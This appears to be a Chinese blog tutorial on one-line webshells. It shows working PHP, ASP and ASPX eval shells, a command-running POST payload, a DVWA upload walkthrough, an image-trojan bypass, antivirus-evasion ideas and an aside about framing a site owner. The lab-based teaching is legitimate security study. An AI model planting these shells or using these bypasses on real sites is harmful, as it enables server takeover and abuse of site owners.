概述
在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢?
先来看看最简单的一句话木马:
<?php @eval($_POST['attack']) ?>
【基本原理】利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过中国菜刀chopper.exe
即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()
函数表示括号内的语句字符串什么的全都当做代码执行。$_POST['attack']
表示从页面中获得attack这个参数值。
入侵条件
其中,只要攻击者满足三个条件,就能实现成功入侵:
(1)木马上传成功,未被杀;
(2)知道木马的路径在哪;
(3)上传的木马能正常运行。
常见形式
常见的一句话木马:
php的一句话木马: <?php @eval($_POST['pass']);?>
asp的一句话是: <%eval request ("pass")%>
aspx的一句话是: <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
我们可以直接将这些语句插入到网站上的某个asp/aspx/php文件上,或者直接创建一个新的文件,在里面写入这些语句,然后把文件上传到网站上即可。
基本原理
首先我们先看一个原始而又简单的php一句话木马:
<?php @eval($_POST['cmd']); ?>
看到这里不得不赞美前辈的智慧。对于一个稍微懂一些php的人而言,或者初级的安全爱好者,或者脚本小子而言,看到的第一眼就是密码是cmd,通过post提交数据,但是具体如何执行的,却不得而知,下面我们分析一句话是如何执行的。
这句话什么意思呢?
(1)php的代码要写在<?php ?>里面,服务器才能认出来这是php代码,然后才去解析。
(2)@符号的意思是不报错,即使执行错误,也不报错。
为什么呢?因为一个变量没有定义,就被拿去使用了,服务器就善意的提醒:Notice,你的xxx变量没有定义。这不就暴露了密码吗?所以我们加上@
(3)为什么密码是cmd呢?
那就要来理解这句话的意思了。php里面几个超全局变量:$_GET
、$_POST
就是其中之一。$_POST['a']
; 的意思就是a这个变量,用post的方法接收。
注释:传输数据的两种方法,get、post,post是在消息体存放数据,get是在消息头的url路径里存放数据(例如xxx.php?a=2)
(4)如何理解eval()函数
?
eval()把字符串作为PHP代码执行。例如:eval("echo 'a'")
;其实就等于直接 echo 'a'
;
再来看看<?php eval($_POST['pw']); ?>
首先,用post方式接收变量pw,比如接收到了:pw=echo 'a'
;这时代码就变成<?php eval("echo 'a';"); ?>
。结果如下:
连起来意思就是:用post方法接收变量pw,把变量pw里面的字符串当做php代码来执行。
所以也就能这么玩:也就是说,你想执行什么代码,就把什么代码放进变量pw里,用post传输给一句话木马。你想查看目标硬盘里有没有小黄片,可以用php函数:opendir()
和readdir()
等等。想上传点小黄片,诬陷站主,就用php函数:move_uploaded_file
,当然相应的html要写好。你想执行cmd命令,则用exec()
。
当然前提是:php配置文件php.ini里,关掉安全模式safe_mode = off
,然后再看看 禁用函数列表 disable_functions = proc_open, popen, exec, system, shell_exec ,把exec去掉,确保没有exec。(有些cms为了方便处理某些功能,会去掉的)
来看看效果,POST代码如下:
cmd=header("Content-type:text/html;charset=gbk");
exec("ipconfig",$out);
echo '<pre>';
print_r($out);
echo '</pre>';
在这里我们可以看到系统直接执行了系统命令。SO,大家现在应该理解,为什么说一句话短小精悍了吧!
木马利用
以下通过DVWA的文件上传漏洞,来看看一句话木马如何使用。完整文章请看:https://blog.csdn.net/weixin_39190897/article/details/86771918
中国菜刀
【实验准备】首先在本地(桌面)保存一句话木马文件Hack.php(用记事本编写后修改文件后缀即可):
<?php @eval($_POST['pass']);?>
接下来进入DVWA平台:http://127.0.0.1:8088/DVWA/index.php ,准备开始实验。
在Low 安全级别下,查看后台源码:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
?>
从源码中发现,low级别未对上传的文件进行任何验证。所以可以直接上传PHP或者ASP一句话木马,此例采用php。
(1)我们将准备好的一句话木马直接上传,然后就可以看到回显的路径:
(2)接着就可以用菜刀连接了,菜刀界面右键,然后点击添加。然后填写相关的数据,如下图:
“中国菜刀”页面操作说明:
1、是连接的URL,就是网站的主路径然后加上上传文件时回显的保存路径;
2、是菜刀连接时的密码,就是上面图片一句话提交的数据(本例为"pass");
3、是一句话的解析类型,可以是asp,php,aspx。不同的解析类型的一句话内容不一样,文件后缀名不一样。
(3)然后可以看连接成功的界面:
(4)接着双击或者右键“文件管理”,进入以下界面:
我们看到了整个网站的结构和文件,甚至是暴漏了我整个电脑主机的磁盘存储!!可以进行任意非法增删查改!!网站(主机)至此沦陷……
图片木马
木马如何才能上传成功?通常防御者都会对类型、大小、进行过滤。另外,若规定是上传的图片,还会对图片进行采集。即使攻击者修改文件类型,也过不了图片采集那一关。所以,这就需要一张图片来做掩护。做成隐藏在图片下的木马。linux和windows都有相应的命令,能够让一个文件融合到另一个文件后面,达到隐藏的目的。
承接上面DVWA实验,High 安全等级,继续先查看源码:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
$uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ];
// Is it an image?
if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
( $uploaded_size < 100000 ) &&
getimagesize( $uploaded_tmp ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>
可以看到,High级别的代码读取文件名中最后一个”.”后的字符串,期望通过文件名来限制文件类型,因此要求上传文件名形式必须是“*.jpg”
、“.jpeg”
、“*.png”
之一。同时,getimagesize()
函数更是限制了上传文件的文件头必须为图像类型。
我们需要将上传文件的文件头伪装成图片,首先利用copy命令
将一句话木马文件Hack.php
与正常的图片文件alone.jpg
合并:
【备注】以下为CMD下用copy命令制作“图片木马”的步骤,其中,
alone.jpg/b
中“b”表示“二进制文件”,Hack.php/a
中“a"表示ASCII码文件。
生成带有木马的图片文件hack.jpg
:
接着我们打开生成的图片木马文件,我们可以看到一句话木马已附在图片文件末尾:
然后我们试着将生成的木马图片文件hack.jpg
上传,上传成功!!!
接下来,上菜刀!!!!!!!!!!!
木马免杀
就算木马能正常运行,那么过段时间会不会被管理员杀掉?如何免杀?上面虽然木马上传成功了,但是只要管理员一杀毒,全部都能杀出来。而且,还会很明确的说这是后门。因此,作为攻击者就得会各种免杀技巧。防御者的防御很简单,什么时候哪个论坛爆出新的免杀技巧,安全人员立马将这玩意儿放入黑名单,那么这种免杀技巧就失效了。所以,攻击者得不断创新,发明新的免杀技巧。
【免杀思路】:
1、将源代码进行再次编码。
2、将那一句话木马进行base64编码,存放在"乱七八糟"的代码中,直接看图:
3、还是一句话木马,进行变形,只不过,这次的变形是在数组中键值对变形。很强。
不得不说,免杀的思路真是越猥琐,越好。研究起来非常有意思。以后等我渗透熟练了,会好好研究一下PHP代码的各种免杀技巧。很好玩,思路很猥琐。